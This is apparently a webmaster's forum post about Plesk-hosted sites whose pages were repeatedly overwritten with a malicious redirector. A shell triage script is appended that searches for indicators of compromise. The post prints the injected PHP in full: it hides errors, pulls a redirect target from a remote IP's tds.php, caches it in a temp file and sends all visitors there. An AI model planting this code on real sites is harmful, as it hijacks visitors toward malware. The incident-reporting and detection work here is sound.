I run several domains under Plesk 10.0.0.
Last night I discovered that one of my domains had all the HTML and PHP files in the directory replaced with files that redirected visitors to a malware site. There was also a new domain created with a number of files in the directories. A quick Google search turned up a thread that showed I wasn't the only one: http://www.webhostingtalk.com/showthread.php?t=1253158
I removed the new domain and files, then replaced all the pages with redirects. I then changed my access passwords. Finally, I updated to Plesk 11.0.9. This was at 5 am this morning.
I just discovered that there were two additional occurrences after this... one about two hours later and another about two hours after that. From what I've found, three other domains had all their web root directory files overwritten with files that included the following PHP code:
Code:
// Keeps the injected file quiet: no PHP warnings reach the visitor or the logs.
ini_set('display_errors',0);

// Polyfill for PHP builds older than 5.2.1 that lack sys_get_temp_dir().
if(!function_exists('sys_get_temp_dir')){
    function sys_get_temp_dir(){
        if(!empty($_ENV['TMP'])){
            return realpath($_ENV['TMP']);
        }
        if(!empty($_ENV['TMPDIR'])){
            return realpath($_ENV['TMPDIR']);
        }
        if(!empty($_ENV['TEMP'])){
            return realpath($_ENV['TEMP']);
        }
        $tempfile=tempnam(__FILE__,'');
        if(file_exists($tempfile)){
            unlink($tempfile);
            return realpath(dirname($tempfile));
        }
        return null;
    }
}

// Remote "traffic direction system" the redirect target is fetched from;
// the fallback target is used until the first fetch succeeds.
$geturl='http://188.190.124.81/tds.php';
$timeout=180;
$default_url='http://www.google.com/robots.txt';
if(!$geturl)exit();

// The fetched target is cached in settings.json under PHP's upload_tmp_dir
// (or the system temp dir) and refreshed every $timeout seconds, so that
// file is an artifact worth looking for on the server.
$base=ini_get('upload_tmp_dir');
if($base==null)$base=sys_get_temp_dir();
$tmp_settings=$base."/settings.json";
$settings=file_exists($tmp_settings)?unserialize(file_get_contents($tmp_settings)):array('last'=>0,'url'=>$default_url);
if($settings['last']<time()-$timeout){
    if($settings['url']=file_get_contents($geturl)){
        $settings['last']=time();
        $fp=fopen($tmp_settings,'w');
        flock($fp,LOCK_EX);
        fputs($fp,serialize($settings));
        flock($fp,LOCK_UN);
        fclose($fp);
    }
}

// Every visitor to the overwritten page is redirected to whatever the
// remote host returned.
$url=$settings['url']?$settings['url']:file_get_contents($geturl);
if(substr($url,0,4)!='http')$url="http://".$url."/";
header("Location: $url");
exit();
I once again replaced the files and changed some passwords. I checked web access and Plesk logs, but there's nothing out of the ordinary. I ran Watchdog, but nothing came up that I couldn't rule out from Google searches.
Any ideas on where to look for the problem?
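A triage script for the redirector shown in the post, added here as an example and not part of the original thread. It greps web roots for the strings visible in the posted code (the IP, the tds.php path, the settings.json cache name), counts the burst of freshly modified files that a mass overwrite leaves behind, and checks a temp directory for the settings.json cache the redirector writes. The /var/www/vhosts path is an assumption (Plesk's default layout); the sample tree it builds is constructed for offline testing.

```shell
#!/bin/sh
# Added example, not from the original post. Triage helpers for the
# redirector shown above. Assumption: Plesk web roots live under
# /var/www/vhosts; pass another directory if yours differ.

# Indicator strings taken from the posted PHP (the IP, the tds.php path
# and the cache file name). Extend as further samples turn up.
INDICATORS='188\.190\.124\.81|/tds\.php|settings\.json'

# Print every .php/.html/.htm file under $1 containing any indicator.
# "|| true" keeps a clean tree (grep exits 1 when nothing matches) from
# aborting a caller that runs under set -e.
find_redirector_files() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) \
        -exec grep -lE "$INDICATORS" {} + 2>/dev/null || true
}

# Count files under $1 modified in the last $2 minutes. A whole web root
# sharing one mtime is the mass overwrite the post describes; that minute
# is the one to look up in the web server, FTP and Plesk logs.
count_recently_modified() {
    find "$1" -type f -mmin "-$2" | wc -l | tr -d ' '
}

# Print $1/settings.json if it looks like the redirector's cache: a
# PHP-serialized array with 'last' and 'url' keys. Check upload_tmp_dir
# (php -i | grep upload_tmp_dir) and the system temp dir.
find_settings_cache() {
    f="$1/settings.json"
    if [ -f "$f" ] && grep -qE 's:4:"last";|s:3:"url";' "$f"; then
        echo "$f"
    fi
}

# Build a constructed sample tree (one infected file, two clean files and
# a cache file) so the checks can be exercised offline; prints its path.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/site1" "$d/site2" "$d/tmp"
    # constructed: reproduces the first lines of the posted redirector
    printf '%s\n' '<?php' "\$geturl='http://188.190.124.81/tds.php';" > "$d/site1/index.php"
    printf '%s\n' '<html><body>clean</body></html>' > "$d/site2/index.html"
    printf '%s\n' '<?php echo "clean";' > "$d/site2/contact.php"
    # constructed: what serialize() of the settings array looks like
    printf '%s' 'a:2:{s:4:"last";i:0;s:3:"url";s:32:"http://www.google.com/robots.txt";}' > "$d/tmp/settings.json"
    echo "$d"
}

# Usage on a real server (assumed default Plesk layout):
#   find_redirector_files /var/www/vhosts
#   count_recently_modified /var/www/vhosts 120
#   find_settings_cache /tmp
```

Run the three functions against the real web roots after each cleanup; if the indicator files or the cache reappear, the write that recreated them happened between the two scans, which narrows the log window to search for the FTP, Plesk or PHP session that did it.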